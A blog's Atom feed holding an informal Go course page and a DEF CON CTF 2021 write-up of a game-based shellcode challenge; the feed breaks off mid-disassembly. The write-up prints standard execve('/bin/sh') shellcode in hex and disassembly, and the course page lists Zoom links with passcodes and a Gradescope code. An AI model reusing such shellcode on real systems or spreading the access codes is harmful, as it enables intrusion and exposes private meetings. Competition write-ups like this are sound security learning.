<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="http://0.0.0.0/feed.xml" rel="self" type="application/atom+xml" /><link href="http://0.0.0.0/" rel="alternate" type="text/html" hreflang="en" /><updated>2025-08-30T13:25:16-04:00</updated><id>http://0.0.0.0/feed.xml</id><title type="html">Hanbang Wang</title><subtitle>Blog by Hanbang Wang @ SEAS.</subtitle><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><entry><title type="html">Introduction to Go</title><link href="http://0.0.0.0/blog/go-101/" rel="alternate" type="text/html" title="Introduction to Go" /><published>2022-01-09T15:05:00-05:00</published><updated>2022-01-09T15:05:00-05:00</updated><id>http://0.0.0.0/blog/go-101</id><content type="html" xml:base="http://0.0.0.0/blog/go-101/"><![CDATA[<h1 id="go-101">Go 101</h1>

<p>Both of my TA’ing classes, CIS 521 and CIS 380, are not offered this semester. So to spend the time elsewhere, I’m going to offer a whole new, experimental zero credit course: <strong>Go 101: Introduction to Go</strong>.</p>

<p>The class will focus on Go syntax, some simple data structure, and Goroutine usage. If we have time, some real-world applications, like OS or network, might be introduced as well.</p>

<p>The class is suitable for anyone who’s interested in Computer Science and Software Engineering, even for people with no prior knowledge in coding. I will try to make the class as approachable as possible. However, if you are interested in learning a language so that you could use an existing framework or tools, like stats, AI, big data, quant, etc., this class might not be ideal for you.</p>

<p><strong>This course is NOT affiliated with Penn</strong>. You get absolutely no course credit or any certification whatsoever. This class, in turn, is absolutely free of charge and all course materials will be released into public domain.</p>

<p>I will still leave homework and they will be graded, and potentially I will give out tests/quizzes/exams. These assignments will not have deadlines.</p>

<p>I plan to hold Office Hours if there are many students and demands are high. Otherwise, email or Piazza should suffice.</p>

<h2 id="resource">Resource</h2>

<dl>
  <dt>Piazza</dt>
  <dd><a target="_blank" href="https://piazza.com/upenn/spring2022/go101">https://piazza.com/upenn/spring2022/go101</a></dd>
  <dt>Gradescope</dt>
  <dd>Entry Code <b>WYREYW</b></dd>
  <dt>Go website</dt>
  <dd><a target="_blank" href="https://go.dev/">The Go Programming Language</a></dd>
  <dt><i>Go 101</i> (Textbook)</dt>
  <dd><a target="_blank" href="https://go101.org/article/101.html">https://go101.org/article/101.html</a></dd>
</dl>

<p>Let me know via Email if you are not a Penn student but still want to access the quiz.</p>

<h2 id="schedule">Schedule</h2>

<p>The meeting time is weekly on Thursday 7 PM to 8:30 PM Eastern Time, from January 13th to April 21st, so 15 meetings in total. This is so far tentative.</p>

<p>Meeting is held remotely via Zoom: <a href="https://upenn.zoom.us/j/93107977009?pwd=ZnFIR0M3VHdWbG1VOS9remJONFJ2UT09">https://upenn.zoom.us/j/93107977009?pwd=ZnFIR0M3VHdWbG1VOS9remJONFJ2UT09</a>. Class will be recorded.</p>

<p>Slides may or may not be made, depending on the content.</p>

<h3 id="jan-13">Jan 13</h3>

<h4 id="topic">Topic</h4>

<ul>
  <li>Class intro</li>
  <li>Programming language intro (and why Go)</li>
  <li>Binary data and memory intro</li>
  <li>Primitive data types in Go</li>
</ul>

<h4 id="recommend-reading">Recommend reading</h4>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Programming_language">Programming language - Wikipedia</a></li>
  <li><a href="https://go.dev/solutions/">Why Go - The Go Programming Language</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Binary_data">Binary data - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Binary_number#Conversion_to_and_from_other_numeral_systems">Conversion to and from other numeral systems | Binary number - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Nibble">Nibble - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Memory_address">Memory address - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Byte">Byte - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Two's_complement">Two’s complement - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Floating-point_arithmetic">Floating-point arithmetic - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/IEEE_754#Formats">IEEE 754 - Wikipedia</a></li>
</ul>

<h4 id="homework">Homework</h4>

<p>A quiz is released on Gradescope.</p>

<h4 id="recording">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/2Zo7h1x8wjBLc0T076D9qAktdORwy2HBi47cW0GDP0vx5yarPxjdzb9pilupCb-_.5AI9jICXkrAZArfN">https://upenn.zoom.us/rec/share/2Zo7h1x8wjBLc0T076D9qAktdORwy2HBi47cW0GDP0vx5yarPxjdzb9pilupCb-_.5AI9jICXkrAZArfN</a> Passcode: 2*+R2EFB</p>

<h3 id="jan-20">Jan 20</h3>

<h4 id="topic-1">Topic</h4>

<ul>
  <li>Packages and function intro</li>
  <li>Variables intro</li>
  <li>Primitive literals
    <ul>
      <li>Integer</li>
      <li>Floating-point</li>
      <li>Complex</li>
      <li>Boolean</li>
      <li>String</li>
    </ul>
  </li>
</ul>

<h4 id="recommend-reading-1">Recommend reading</h4>

<p><a href="https://go101.org/article/basic-types-and-value-literals.html">Basic Types and Basic Value Literals -Go 101</a></p>

<h4 id="homework-1">Homework</h4>

<p>A quiz is released on Gradescope.</p>

<h4 id="recording-1">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/CwUbPM2_T1sbMhVBAY_vGwysJMd234extmseDMVD64romoRXQ93lKK-hKah71yYx.1-kwbZNHCoTtvOMs">https://upenn.zoom.us/rec/share/CwUbPM2_T1sbMhVBAY_vGwysJMd234extmseDMVD64romoRXQ93lKK-hKah71yYx.1-kwbZNHCoTtvOMs</a> Passcode: Dg8!dHA5</p>

<h3 id="jan-27">Jan 27</h3>

<h4 id="topic-2">Topic</h4>

<ul>
  <li>Basic Operators</li>
  <li>Variables (continued) and Constants</li>
  <li>Type conversion</li>
  <li><del>Scope</del></li>
</ul>

<h4 id="recommend-reading-2">Recommend reading</h4>

<ul>
  <li><a href="https://go101.org/article/operators.html">Common Operators -Go 101</a></li>
  <li><a href="https://go101.org/article/constants-and-variables.html">Constants and Variables -Go 101</a></li>
</ul>

<h4 id="homework-2">Homework</h4>

<p>A quiz is released on Gradescope.</p>

<h4 id="recording-2">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/WbADhx89M5ynkIG0o7XEaIzWXMBzuZwNXjlOXLmrOLwaSMAV67qlZ5yeCd62Pr6i.4hZ9JBlD_cSda3ti">https://upenn.zoom.us/rec/share/WbADhx89M5ynkIG0o7XEaIzWXMBzuZwNXjlOXLmrOLwaSMAV67qlZ5yeCd62Pr6i.4hZ9JBlD_cSda3ti</a> (Passcode: Nj@T5!x^)</p>

<h3 id="feb-3">Feb 3</h3>

<h4 id="topic-3">Topic</h4>

<ul>
  <li>Scope</li>
  <li>Intro to functions</li>
  <li>Package and Import</li>
  <li>Array</li>
  <li>Write and compile code demo</li>
</ul>

<h4 id="recommend-reading-3">Recommend reading</h4>

<ul>
  <li><a href="https://go101.org/article/packages-and-imports.html">Code Packages and Package Imports -Go 101</a></li>
  <li><a href="https://go101.org/article/function-declarations-and-calls.html">Function Declarations and Function Calls -Go 101</a> (only relevant part)</li>
  <li><a href="https://go101.org/article/container.html">Arrays, Slices and Maps in Go -Go 101</a> (only relevant part)</li>
</ul>

<h4 id="recording-3">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/Pb3fBvqMnUu6887REkODH1OKu8kWRfNg4HlEPrfrWzCKNtp8PMJ047lBs4a_Iitd.TTIQK1i6qyoEpTXK">https://upenn.zoom.us/rec/share/Pb3fBvqMnUu6887REkODH1OKu8kWRfNg4HlEPrfrWzCKNtp8PMJ047lBs4a_Iitd.TTIQK1i6qyoEpTXK</a> (Passcode: Hyw3b=nw)</p>

<h4 id="homework-3">Homework</h4>

<p>A programming assignment is released on Gradescope.</p>

<h2 id="homework-4">Homework</h2>

<h3 id="operators--functions">Operators &amp; Functions</h3>

<p>In this first assignment, you are asked to write some functions with the given signature, and then implement the required functionalities within it.</p>

<p>There are five parts to the assignment. Due to Go being a compiled language, and in this homework we are testing the ability to write functions, so you have to finish (almost) the entire homework in order to pass the compilation. The autograder will then test  if the implemented functions has the correct functionality.</p>

<p>Before you start, please follow the instructions to install Go on your local computer (you should have it if you have finished Quiz 1). Then, follow the demo at the end of <em>Feb 3</em> class, where we showed how to prepare a Go environment on your computer.</p>

<p>Once you have done that, create a file named <code class="language-plaintext highlighter-rouge">main.go</code> under your working directory. This is the file in where you are going to write Go program for this homework, and only this file. After you finished the homework, you should submit ONLY this file onto Gradescope.</p>

<p>For this homework, use package name <code class="language-plaintext highlighter-rouge">main</code>.</p>

<h4 id="part-1">Part 1</h4>

<p>Declare a <strong>constant</strong> at <strong>package-level</strong> of the <code class="language-plaintext highlighter-rouge">main</code> package, named <code class="language-plaintext highlighter-rouge">CourseName</code>, which has type <code class="language-plaintext highlighter-rouge">string</code> and value <code class="language-plaintext highlighter-rouge">"Go 101"</code>.</p>

<p>Recall that a constant declaration starts with <code class="language-plaintext highlighter-rouge">const</code>, and that package-level is the top-level of a file (i.e. not in a code block). Also recall that identifiers are case sensitive.</p>

<h4 id="part-2">Part 2</h4>

<p>Declare a <strong>variable</strong> at <strong>package-level</strong> of the <code class="language-plaintext highlighter-rouge">main</code> package, named <code class="language-plaintext highlighter-rouge">Counter</code>, which has type <code class="language-plaintext highlighter-rouge">uint8</code> and its zero-value. Recall that variable declaration starts with <code class="language-plaintext highlighter-rouge">var</code>.</p>

<p>After that, declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">IncCounter</code>, which has no arguments and no return values. Each time <code class="language-plaintext highlighter-rouge">IncCounter</code> is called, <strong>increase</strong> <code class="language-plaintext highlighter-rouge">Counter</code> by <strong>one</strong>. Recall operators <code class="language-plaintext highlighter-rouge">+</code>, <code class="language-plaintext highlighter-rouge">+=</code>, or <code class="language-plaintext highlighter-rouge">++</code>.</p>

<p>Your code should not access <code class="language-plaintext highlighter-rouge">Counter</code> anywhere else.</p>

<h4 id="part-3">Part 3</h4>

<p>Declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">BoolOperation</code>, which takes in <strong>two</strong> <code class="language-plaintext highlighter-rouge">bool</code> arguments and returns <strong>four</strong> <code class="language-plaintext highlighter-rouge">bool</code> values.</p>

<p>The first return value is the <strong>logical and</strong> of the two input arguments; the second return value is the <strong>logical or</strong> of the two input arguments; the third return value is the <strong>logical not</strong> of the first input argument; the fourth return value is the <strong>logical not</strong> of the second input argument.</p>

<p>Recall that <strong>logical and</strong> uses the binary operator <code class="language-plaintext highlighter-rouge">&amp;&amp;</code>, <strong>logical or</strong> uses the binary operator <code class="language-plaintext highlighter-rouge">||</code>, and <strong>logical not</strong> uses the unary operator <code class="language-plaintext highlighter-rouge">!</code>. Also recall returning values using the <code class="language-plaintext highlighter-rouge">return</code> keyword.</p>

<h4 id="part-4">Part 4</h4>

<p>Declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">IntArrayOperation</code>, which takes in a single <strong><code class="language-plaintext highlighter-rouge">int</code> array of size 4</strong>, and returns <strong>three</strong> <code class="language-plaintext highlighter-rouge">int</code> values.</p>

<p>The first return value is the <strong>sum</strong> of the first element in the array and the second element in the array; The second return value is the <strong>sum</strong> of the third element in the array and the fourth element in the array; The third return value is the <strong>product</strong> (multiplication) of the previous two return values (i.e. the product of the sum of the first and second and the sum of the third and fourth element in the argument array).</p>

<p>Recall operator <code class="language-plaintext highlighter-rouge">+</code> and <code class="language-plaintext highlighter-rouge">*</code>, also make sure to take care of calculation precedence. Recall the type of an array of type <code class="language-plaintext highlighter-rouge">T</code> with size <code class="language-plaintext highlighter-rouge">N</code> is <code class="language-plaintext highlighter-rouge">[N]T</code>. Recall that accessing the <em>i</em>th element of an array <code class="language-plaintext highlighter-rouge">arr</code> uses the indexing <code class="language-plaintext highlighter-rouge">arr[i]</code>, and that index starts from <strong>0</strong>.</p>

<p>You can assume that doing the above operations won’t cause overflows.</p>

<h4 id="part-5">Part 5</h4>

<p>Declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">PackFloatArray</code>, which takes in <strong>four</strong> <code class="language-plaintext highlighter-rouge">float64</code> as its argument, and returns a single <strong><code class="language-plaintext highlighter-rouge">float64</code> array of size 4</strong>.</p>

<p>As the name goes, the return value should be a <code class="language-plaintext highlighter-rouge">float64</code> array whose stored values are the four given arguments, stored with the order they were given. More specifically, the first value in the array should be the first argument given to the function, the second value in the array should be the second argument given to the function, so on and so forth.</p>

<p>To return an array, return it the same way as any other values.</p>

<hr />

<p>After implementing these five parts, first you should check if your code successfully compiles. Notice that success compilation doesn’t mean that the program is correct, but it does mean that all the types and operations are valid.</p>

<p>Later we will talk about how to properly write test cases for your code. For now, we can just use <code class="language-plaintext highlighter-rouge">main</code> function as a way to test our program. Within the <code class="language-plaintext highlighter-rouge">main</code> function, write some value and then call the function with the value. Output the results using <code class="language-plaintext highlighter-rouge">println</code> or <code class="language-plaintext highlighter-rouge">fmt.Println</code>. If the output result seems correct, then you are good.</p>

<p>Submit <code class="language-plaintext highlighter-rouge">main.go</code> onto Gradescope and get a score to see how well you did!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="Go" /><category term="Lecture" /><summary type="html"><![CDATA[An experimental zero credit course.]]></summary></entry><entry><title type="html">DEF CON CTF 2021</title><link href="http://0.0.0.0/blog/defcon-ctf-2021/" rel="alternate" type="text/html" title="DEF CON CTF 2021" /><published>2021-08-22T12:30:00-04:00</published><updated>2021-08-22T12:30:00-04:00</updated><id>http://0.0.0.0/blog/defcon-ctf-2021</id><content type="html" xml:base="http://0.0.0.0/blog/defcon-ctf-2021/"><![CDATA[<p>A week before the game, Tea Deliverers split up into four sub-teams and held an inner competition using some of the past challenges with some minor tweaks. I was the only one doing the KoH challenge in our team, and I was doing fairly okay, so I decided to be a KoH player for the finals. I was sure the challenges would keep me busy whilst not stress me out during the game, as there would be one and only one completely new challenge each day.</p>

<p>Turned out I was right. I enjoyed each and every King of the Hill challenge, and I got enough rest during the time off when it’s daytime in China, very healthy lifestyle indeed.</p>

<h1 id="zero-is-you">zero-is-you</h1>

<p><img src="/assets/images/defcon-ctf-2021/zero-is-you-score.png" alt="zero-is-you-score" /></p>

<p>This was a copy of the game <em>Baba is You</em>. What’s nice about the original game is that it’s already Turing complete, and just to add shellcode execution onto it, woah, you just opened the gate to another dimension. (insert mind-blown meme pic here)</p>

<p>For those without prior experience in <em>Baba is You</em>, the game is a Sokoban-kind puzzle game, where the player can push different blocks into different places. There are some famous modern development of this classic genre, like <em>A Good Snowman Is Hard To Build</em> or <em>Stephen’s Sausage Roll</em>. The twist with <em>Baba is You</em> is that the blocks themselves can be a part of an instruction that tells how the game world functions. I will explain this more in the following.</p>

<p>I really recommend you trying out <em>Baba is You</em>, but for a <small>smol</small> brain like me, I can’t finish the game without referencing a walkthrough, sad.</p>

<h2 id="extract-game-code">Extract Game Code</h2>

<p>Within the provided package <code class="language-plaintext highlighter-rouge">game_client.tgz</code>, there were a few files, <code class="language-plaintext highlighter-rouge">README</code>, <code class="language-plaintext highlighter-rouge">start</code>, <code class="language-plaintext highlighter-rouge">sync</code>, and a <code class="language-plaintext highlighter-rouge">build</code> folder. <code class="language-plaintext highlighter-rouge">README</code> told us how the game worked. <code class="language-plaintext highlighter-rouge">start</code> was a shell script that simply run <code class="language-plaintext highlighter-rouge">zero-is-you</code> binary within the <code class="language-plaintext highlighter-rouge">build</code> folder.</p>

<p>For <code class="language-plaintext highlighter-rouge">sync</code>, since we needed to run it by <code class="language-plaintext highlighter-rouge">python3</code>, it must be a Python program. It was not a text file, so it must be a compiled Python byte-code like <code class="language-plaintext highlighter-rouge">.pyc</code>. Using an existing decompiler like <a href="https://github.com/rocky/python-decompile3">rocky/python-decompile3</a>, we were able to decompile <code class="language-plaintext highlighter-rouge">sync</code> into a Python source code. There’s nothing interested about <code class="language-plaintext highlighter-rouge">sync</code>, it just uploads and downloads to and from the server. As for what data it actually transmitted, we’ll get back to it in a sec.</p>

<p>After @riatre gave us the hint that the entire game is written in Python, as a Game Data-Mine Professional™, without playing the game first, I dove directly into extracting the game data. A quick <code class="language-plaintext highlighter-rouge">strings</code> of the <code class="language-plaintext highlighter-rouge">zero-is-you</code> elf binary showed things like <code class="language-plaintext highlighter-rouge">_MEIPASS2</code>, and a quick Google search told us that this was a program packed by <code class="language-plaintext highlighter-rouge">PyInstaller</code>. Using an existing extractor <a href="https://github.com/extremecoders-re/pyinstxtractor">extremecoders-re/pyinstxtractor</a>, we were able to extract every <code class="language-plaintext highlighter-rouge">.pyc</code> from the binary. And using the aforementioned decompiler, we could turn these bytecodes back into their <code class="language-plaintext highlighter-rouge">.py</code> form. Although there were some decompile errors, we were getting most part of the game in source code form.</p>

<p>Once we had the extracted game, my teammates could run the game on Windows and MacOS without problems. We also implemented custom functionalities to the game, such as undoing a move, which was just to replay the moves. The decompiled source code also helped us figure out the format of level files and rules of the game, which I will talk about later.</p>

<h2 id="ready-player-one">Ready Player One</h2>

<p>OOO’s internet is down so we were not able to use <code class="language-plaintext highlighter-rouge">sync</code> to communicate with the server, but they kindly sent us the <code class="language-plaintext highlighter-rouge">level1</code> file so that we can look into this level first.</p>

<p>With some prior experience with <em>Baba is You</em>, I immediately knew what’s going on. On the top we had two “rules,” <code class="language-plaintext highlighter-rouge">zero is you</code> and <code class="language-plaintext highlighter-rouge">ice is stop</code>. The former meant that we were currently in control of <code class="language-plaintext highlighter-rouge">zero</code>, and the latter meant that everything should stop in front of <code class="language-plaintext highlighter-rouge">ice</code>. So <code class="language-plaintext highlighter-rouge">zero</code> referred to the little hacker boy icon in the middle of the screen, this could be easily checked by moving <code class="language-plaintext highlighter-rouge">zero</code> using arrow keys; <code class="language-plaintext highlighter-rouge">ice</code> referred to ice blocks surrounding the middle part of the screen, and a line of ice blocks at the top.</p>

<p>Any such “rule” consisted of three blocks that looked like <code class="language-plaintext highlighter-rouge">[xxx] [is] [yyy]</code> reading from left to right or top to bottom would be enforced in the game world. You could make a new rule by pushing the blocks around and putting them together, or break existing rules by splitting the blocks up. The special rule is that <code class="language-plaintext highlighter-rouge">[noun] is you</code> will make the player able to control that <code class="language-plaintext highlighter-rouge">[noun]</code> thing on the board, just like <em>Baba is You</em>.</p>

<p>However, the processor-looking block and a line of hex values at the top of the screen was something not in <em>Baba is You</em>. With a further look into the source code and a few trial-and-errors with the blocks, we figured out how the entire game works:</p>

<h3 id="shellcode-mechanism">Shellcode Mechanism</h3>

<p>The entire screen we saw, which was a \(25 \times 15\) space of blocks, was actually the memory of the machine, meaning the address of the machine ranged from <samp>0x0</samp> to <samp>0x176</samp>. The memory read from left to right, so the layout was</p>

\[\begin{matrix} 
\texttt{0x00} &amp; \texttt{0x01} &amp;\cdots &amp;\texttt{0x18} \\
\texttt{0x19} &amp;\texttt{0x20}&amp;\cdots  \\
\vdots &amp; \vdots &amp;\ddots &amp; \\
\texttt{0x15e} &amp;\texttt{0x25f}&amp; \cdots &amp; \texttt{0x176} 
\end{matrix}\]

<p>The hex bytes displayed on those blocks were then the values on that memory address. If the value is zero, then that block would be displayed as empty. However, you could switch the display style by pressing <kbd>`</kbd> (backquote), which let you hide the game block and display the empty zero values.</p>

<p>The block that looked like a processor, which is on the top-left corner of the game, would act as a program counter (or instruction pointer) that would execute the memory, if and only if an architecture was specified (<code class="language-plaintext highlighter-rouge">cpu is [arch]</code> was on the board) and <code class="language-plaintext highlighter-rouge">cpu is run</code> was on the board at the same time. If <code class="language-plaintext highlighter-rouge">cpu is run</code> was on the board but no architecture was specified, a segfault would be thrown.</p>

<p>When <code class="language-plaintext highlighter-rouge">cpu is run</code> was on the board, every time the player made a move, either using arrow keys or the <kbd>Space</kbd> key to stay where you were, the machine would execute the instruction at the program counter (location of the processor block).</p>

<p>The level would be cleared when a syscall to <code class="language-plaintext highlighter-rouge">SYS_EXECV</code> was invoked with the argument being either <code class="language-plaintext highlighter-rouge">/bin/sh</code> or <code class="language-plaintext highlighter-rouge">/bin/bash</code> after sanitized by <code class="language-plaintext highlighter-rouge">os.path.abspath</code> in Python. For example, for <code class="language-plaintext highlighter-rouge">x64</code> arch, that means if we could put an address to a string <code class="language-plaintext highlighter-rouge">/bin/sh</code> in <code class="language-plaintext highlighter-rouge">rdi</code> and 0x3b in <code class="language-plaintext highlighter-rouge">al</code>, and then invoke a <code class="language-plaintext highlighter-rouge">syscall</code>, we could pass the level.</p>

<h3 id="level-file-decryption">Level File Decryption</h3>

<p>The level file decryption was inside the file <code class="language-plaintext highlighter-rouge">utils.py</code> after unpacking and decompiling. It looked something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">load_level_data</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>
    <span class="n">key</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">zero</span><span class="sh">'</span>
    <span class="n">l</span> <span class="o">=</span> <span class="nf">len</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
    <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb</span><span class="sh">'</span><span class="p">)</span> <span class="nf">as </span><span class="p">(</span><span class="n">f</span><span class="p">):</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nf">read</span><span class="p">()[</span><span class="mi">3</span><span class="p">:]</span>
        <span class="n">compressed</span> <span class="o">=</span> <span class="nf">bytearray</span><span class="p">((</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="n">key</span><span class="p">[(</span><span class="n">i</span> <span class="o">%</span> <span class="n">l</span><span class="p">)]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nf">len</span><span class="p">(</span><span class="n">data</span><span class="p">))))</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">zlib</span><span class="p">.</span><span class="nf">decompress</span><span class="p">(</span><span class="n">compressed</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">data</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="sh">'</span><span class="s">utf8</span><span class="sh">'</span><span class="p">)</span>
</code></pre></div></div>

<p>Figured this out, we could view the level file in its clear text form. Level 1’s file after decryption looked like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Ready Player One
W wall
w _WALL
I ice
i _ICE
Z zero
s _is
t _STOP
z _ZERO
m _YOU
1 cpu
c _CPU
x _x64
b _BUG
r _RUN
B bug

1........................  90 48 83 c4 50 50 48 bb 2f 62 69 6e 2f 2f 73 68 53 54 5f b0 3b 0f 05
IIIIIIIIIIIIIIIIIIIIIIIII  
zsm...................ist
.........................
.......IIIIIIIIIII.......
.......I.........I.......
.......I....s....I.......
.......I...cxr...I.......
.......I....s....I.......
.......I.........I.......
.......I....Z....I.......
.......IIIIIIIIIII.......
.........................
.........................
.........................
.........................
</code></pre></div></div>

<p>The first line says the title name of the level. The following lines before an empty line says what each character meant in the game board representation down below. And then we have a \(25 \times 15\) board made out of ASCII characters, each line followed by a maximum of \(25\) hex values, representing the memory values on the board. If the line is trailing with <code class="language-plaintext highlighter-rouge">00</code>s, then those values are omitted.</p>

<p>We could build custom levels as well by reversing what the function does. We could also alter the existing levels to make testing out solutions much easier.</p>

<h2 id="playing-the-game">Playing the Game</h2>

<p>Now going back to the first level, there was only one <code class="language-plaintext highlighter-rouge">cpu</code> block and one arch <code class="language-plaintext highlighter-rouge">x64</code> we could use, meaning we had to somehow first set <code class="language-plaintext highlighter-rouge">cpu is x64</code> and then set <code class="language-plaintext highlighter-rouge">cpu is run</code> without breaking the first one. Recall that the rules were parsed from left to right AND from up to down. Therefore, we could put <code class="language-plaintext highlighter-rouge">cpu</code> at the upper-left corner, so it could be used by two rules at the same time, something like this:</p>

\[\begin{matrix}
\texttt{cpu} &amp; \texttt{is} &amp; \texttt{x64}\\
\texttt{is}\\
\texttt{run} 
\end{matrix}\]

<p>After I did that and moved around to execute the instructions, we cleared the level. But before we go to the next level, let’s first take a look at the shellcode for the first level:</p>

<pre><code class="language-asm">0:  90                      nop
1:  48 83 c4 50             add    rsp,0x50
5:  50                      push   rax
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 53                      push   rbx
11: 54                      push   rsp
12: 5f                      pop    rdi
13: b0 3b                   mov    al,0x3b
15: 0f 05                   syscall
</code></pre>

<p>As we can see, this is a pretty normal shellcode that does a syscall with <code class="language-plaintext highlighter-rouge">al</code> being <code class="language-plaintext highlighter-rouge">0x3b</code> and <code class="language-plaintext highlighter-rouge">rdi</code> points to a string in the memory that is <code class="language-plaintext highlighter-rouge">/bin//sh</code>. The extra slash does not matter because it would be sanitized out by <code class="language-plaintext highlighter-rouge">os.path.abspath</code> in Python.</p>

<h3 id="flatline">Flatline</h3>

<p>This time we had a <code class="language-plaintext highlighter-rouge">x86</code> machine, and a quick disassembling told us</p>

<pre><code class="language-asm">0:  83 c4 20                add    esp,0x20
3:  50                      push   eax
4:  68 2f 2f 73 68          push   0x68732f2f
9:  68 2f 62 69 6e          push   0x6e69622f
e:  89 e3                   mov    ebx,esp
10: 89 c1                   mov    ecx,eax
12: 89 c2                   mov    edx,eax
14: b0 0b                   mov    al,0xb
16: cd 80                   int    0x80
</code></pre>

<p>That we had a completely valid shellcode here already, so the only thing we needed to do is to run <code class="language-plaintext highlighter-rouge">cpu</code>. The only <code class="language-plaintext highlighter-rouge">cpu is run</code> was at the left side of the game board, so we had to get there. However, we were surrounded by a wall of virus blocks, and <code class="language-plaintext highlighter-rouge">virus</code> had two rules enforced on them at the start of the game: <code class="language-plaintext highlighter-rouge">virus is stop</code> and <code class="language-plaintext highlighter-rouge">virus is kill</code>. We could only disable <code class="language-plaintext highlighter-rouge">virus is stop</code> by pushing away any of the blocks in that rule, but after that, when we tried to step onto a virus block, we would be killed immediately with a “game over” screen.</p>

<p>It seemed impossible to disable the rule without leaving the “virus jail,” but we had to leave the jail first to move the block away, so it’s a paradox! However, this was just another famous trick in <em>Baba is You</em>, where you realize that the “kill” command only applies to the player but not other things in the game world, so other blocks can move freely through the virus block, assuming <code class="language-plaintext highlighter-rouge">virus is stop</code> is not in effect.</p>

<p>The solution then is something like this:</p>

<p><img src="/assets/images/defcon-ctf-2021/zero-lvl02-sol.png" alt="zero-lvl02-sol" /></p>

<p>Where you first line up the blocks at the bottom horizontally, then push the blocks from the right so the blocks pushes each other and extends out, until they reach <code class="language-plaintext highlighter-rouge">virus is stop</code> and split that rule. After that, our Zero can walk pass through the <code class="language-plaintext highlighter-rouge">virus</code> blocks and push together <code class="language-plaintext highlighter-rouge">cpu is run</code> to finish the game. This strategy came in handy in the later part of the game as well.</p>

<h3 id="ice-crash">ICE Crash</h3>

<p>For this level, we had <code class="language-plaintext highlighter-rouge">cpu is x64</code> and <code class="language-plaintext highlighter-rouge">cpu is run</code> already in effect. However, if we just wander around and let the program executes, the processor would move to the next line and hits the ice, resulting in a segfault, because <code class="language-plaintext highlighter-rouge">ice is stop</code> was also in effect.</p>

<p>Let’s then look at this level’s shellcode</p>

<pre><code class="language-asm">0:  48 83 c4 18             add    rsp,0x18
...
c:  50                      push   rax
...
19: 48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
20: 2f 73 68
23: 53                      push   rbx
24: 54                      push   rsp
25: 5f                      pop    rdi
...
32: b0 3b                   mov    al,0x3b
34: 0f 05                   syscall
</code></pre>

<p>The zeros were hidden since <code class="language-plaintext highlighter-rouge">00 00</code> was very similar to <code class="language-plaintext highlighter-rouge">nop</code> in our case. This was a normal shellcode, and if we could execute the entirety of this shellcode, we could pass this level. Therefore, we must had somehow made the processor execute the program without being <code class="language-plaintext highlighter-rouge">stop</code>ed.</p>

<p>It looked like there were two <code class="language-plaintext highlighter-rouge">ice is stop</code> on the board right now, so we could just break them up and that should solve the problem, right? A few tries told us that we just didn’t have enough time to break the blocks up before the processor reached an ice block.</p>

<p>Notice that for all the levels before, we had most of the rules formed in a way that looks like <code class="language-plaintext highlighter-rouge">[noun] is [verb]</code>, but it’s possible to turn something into something else by setting up a rule as <code class="language-plaintext highlighter-rouge">[noun] is [noun]</code>. Looking at the board, we had <code class="language-plaintext highlighter-rouge">zero is you</code> exposed to the player. That meant it was possible to form <code class="language-plaintext highlighter-rouge">ice is zero</code> or <code class="language-plaintext highlighter-rouge">ice is you</code> in the game.</p>

<p>In fact, both solutions work: <code class="language-plaintext highlighter-rouge">ice is zero</code> would turn the ice into a bunch of Zero so the processor would not be stopped since the ice blocks are gone. And <code class="language-plaintext highlighter-rouge">ice is you</code> would make the player be able to control the <code class="language-plaintext highlighter-rouge">ice</code> so we could move the ice blocks out of the way.</p>

<h3 id="high-speed-pizza-delivery">High-speed Pizza Delivery</h3>

<p>Here we had <code class="language-plaintext highlighter-rouge">cpu is x64</code> and <code class="language-plaintext highlighter-rouge">ice is stop</code> at the bottom of the screen where we were unable to reach. And we had a bunch of new blocks that looked like different registers. Ignoring that first and putting <code class="language-plaintext highlighter-rouge">cpu is run</code> together, we could see the processor reached the end of the shellcode and then a segfault was thrown. Let’s take a look at the shellcode then:</p>

<pre><code class="language-asm">0:  90                      nop
1:  90                      nop
2:  48 83 c4 50             add    rsp,0x50
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 50                      push   rax
